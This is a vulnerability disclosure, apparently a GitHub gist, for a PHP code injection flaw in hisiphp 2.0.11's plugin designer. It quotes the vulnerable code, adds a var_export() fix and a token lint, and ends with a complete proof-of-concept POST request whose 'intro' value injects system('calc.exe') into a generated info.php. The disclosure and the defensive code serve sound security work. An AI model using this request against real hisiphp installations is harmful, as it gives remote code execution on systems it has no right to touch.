@LioTree
Last active April 28, 2024 09:10
Code injection vulnerability in hisiphp

A code injection vulnerability in hisiphp 2.0.11

In https://github.com/hisiphp/hisiphp/blob/d05c908c29d574b84aa9e8932b13a5ef54e0a429/application/system/admin/Plugins.php#L129, $data is the raw POST body of the plugin design request, so every field in it is user-controlled:

$model = new PluginsModel();
$data = $this->request->post();
$result = $this->validate($data, 'app\system\validate\SystemPlugins');
if ($result !== true) {
    return $this->error($result);
}

if (!$model->design($data)) {
    return $this->error($model->getError());
}

The validator https://github.com/hisiphp/hisiphp/blob/thinkphp5.1/v2/application/system/validate/SystemPlugins.php is applied to $data, but it only constrains the fields listed in its $rule array. Any other field, notably intro, passes through unchecked:

class SystemPlugins extends Validate
{
    // validation rules
    protected $rule = [
        'name|插件名称'     => 'require|alpha|unique:system_plugins',
        'title|插件标题'     => 'require|chsAlphaNum|unique:system_plugins',
        'identifier|插件标识' => 'require|regex:/^[A-Za-z0-9\-\.\_]+$/',
        'author|开发者'     => 'requireWith:author|chsAlphaNum',
        'url|开发者网址'     => 'requireWith:url|url',
        'version|版本号'     => 'require|regex:/^[0-9][.][0-9][.][0-9]+$/',
    ];
}

In https://github.com/hisiphp/hisiphp/blob/d05c908c29d574b84aa9e8932b13a5ef54e0a429/application/system/model/SystemPlugins.php#L455, the model builds the plugin's info.php as a heredoc string and writes it to disk. Every value is interpolated into a single-quoted PHP literal with no escaping, and $data['intro'] in particular has no validation rule, so a single quote in intro terminates the literal and whatever follows it is parsed as PHP when the file is later loaded:

        $code = <<<INFO
<?php
/**
 * Plugin basic information
 */
return [
    // Core framework [required]
    'framework' => 'thinkphp5.1',
    // Plugin name [required]
    'name'        => '{$data['name']}',
    // Plugin title [required]
    'title'       => '{$data['title']}',
    // Unique module identifier [required], format: pluginname.[app-market ID].plugins.[app-market branch ID]
    'identifier'  => '{$data['identifier']}',
    // Plugin icon [required]
    'icon'        => '/static/plugins/{$data['name']}/{$data['name']}.png',
    // Plugin description [optional]  <-- unvalidated, unescaped user input
    'intro' => '{$data['intro']}',
    // Plugin author [required]
    'author'      => '{$data['author']}',
    // Author homepage [optional]
    'author_url'  => '{$data['url']}',
    // Version [required], three-part format: major.minor.patch
    // Major [range 1-99]: changes on large updates or major changes, e.g. when the overall architecture changes.
    // Minor [range 0-999]: changes when features are added or removed; unchanged when only extending existing features.
    // Patch [range 0-999]: bug fixes or small changes with no major functional change; fixing a serious bug warrants a patch release.
    'version'     => '{$data['version']}',
    // Original database table prefix; required when the plugin ships a sql file
    'db_prefix' => 'db_',
    // Format: ['sort' => '100','title' => 'config title','name' => 'config name','type' => 'config type','options' => 'config options','value' => 'config default', 'tips' => 'config hint']; see admin backend -> System -> System features -> Config management -> Add for each parameter
    'config'    => {$config},
];
INFO;
        file_put_contents($path.'info.php', $code);
    }
}
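As an added example (not hisiphp's own code), the PHP below contrasts the interpolation pattern above with a generator that emits each value through var_export(), and adds a token-level lint that flags a generated config file containing anything other than a plain `return [...]` array of literals. The function names generate_info_vulnerable, generate_info_safe and find_unexpected_tokens are chosen here, the heredoc is reduced to two fields, and the input array is constructed to mirror the PoC payload.

```php
<?php
// Added example, not hisiphp code. Shows why interpolating user input into a
// single-quoted PHP literal is code injection, how var_export() fixes it, and
// how to lint a generated info.php for injected tokens without executing it.

declare(strict_types=1);

// Mirrors the heredoc pattern in SystemPlugins::design(): values are dropped
// into single-quoted literals with no escaping, so a quote in $data['intro']
// closes the literal and the remainder is parsed as PHP.
function generate_info_vulnerable(array $data): string
{
    return <<<INFO
<?php
return [
    'name'  => '{$data['name']}',
    'intro' => '{$data['intro']}',
];
INFO;
}

// Hardened variant: var_export() produces a correctly quoted and escaped PHP
// string literal for any input, so the value can never break out of it.
function generate_info_safe(array $data): string
{
    $name  = var_export((string) $data['name'], true);
    $intro = var_export((string) $data['intro'], true);
    return <<<INFO
<?php
return [
    'name'  => {$name},
    'intro' => {$intro},
];
INFO;
}

// Lint for generated config files: a "return [ ... ]" array of string/number
// literals should only ever contain the tokens below. A T_STRING (function
// name), '(' or '.' means something was injected into the file.
function find_unexpected_tokens(string $php): array
{
    $allowedTokens = [
        T_OPEN_TAG, T_WHITESPACE, T_COMMENT, T_DOC_COMMENT, T_RETURN,
        T_CONSTANT_ENCAPSED_STRING, T_DOUBLE_ARROW, T_LNUMBER, T_DNUMBER,
    ];
    $allowedChars = ['[', ']', ',', ';'];
    $unexpected = [];
    foreach (token_get_all($php) as $tok) {
        if (is_array($tok)) {
            if (!in_array($tok[0], $allowedTokens, true)) {
                $unexpected[] = token_name($tok[0]) . ':' . $tok[1];
            }
        } elseif (!in_array($tok, $allowedChars, true)) {
            $unexpected[] = $tok;
        }
    }
    return $unexpected;
}

// Constructed input reproducing the PoC's intro parameter after URL decoding.
$data = ['name' => 'test', 'intro' => "'.system('calc.exe').'"];

$vuln = generate_info_vulnerable($data);
$safe = generate_info_safe($data);

echo "--- interpolation generator ---\n", $vuln, "\n";
$bad = find_unexpected_tokens($vuln);
echo "unexpected tokens: ", implode(' ', $bad), "\n\n";
// -> '.', T_STRING:system, '(', ')' and '.': the payload parses as a call.

echo "--- var_export generator ---\n", $safe, "\n";
$bad = find_unexpected_tokens($safe);
echo "unexpected tokens: ", ($bad ? implode(' ', $bad) : '(none)'), "\n";
// -> (none): the payload is one T_CONSTANT_ENCAPSED_STRING and stays inert.
```

Run it with `php example.php`. The same find_unexpected_tokens() check can be pointed at every existing plugins/*/info.php on a deployed instance to find plugins that were already created with a hostile intro, and it is a cheap regression test for the generator. Independently of the generator fix, intro should also get a rule in the SystemPlugins validator like the other fields (the chsAlphaNum rule used for title, for instance), so that a quote never reaches the model in the first place.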

POC (the intro parameter URL-decodes to '.system('calc.exe').'):

POST /admin.php/system/plugins/design.html HTTP/1.1
Host: www.myhisiphp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 209
Origin: http://www.myhisiphp.com
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://www.myhisiphp.com/admin.php/system/plugins/design.html
Cookie: PHPSESSID=fljtslc00l472cll5df60ilp39; hisiadmin_language=zh-cn; hisihisi_admin_theme=default; hisihisi_iframe=1; hisi_language=zh-cn

name=test&title=test&identifier=test&intro=%27%2Esystem%28%27calc%2Eexe%27%29%2E%27&author=test&url=http%3A%2F%2Fwww.test.com&version=1.0.0&dir=admin%0D%0Ahome%0D%0Amodel%0D%0Asql%0D%0Avalidate%0D%0Aview%0D%0A

The generated plugins/test/info.php then contains:

return [
    //......
    'intro' => ''.system('calc.exe').'',
    //......
];

Visiting /admin.php/system/plugins/install/id/5.html, where 5 is the id of the plugin just created, loads that info.php and executes the injected code.
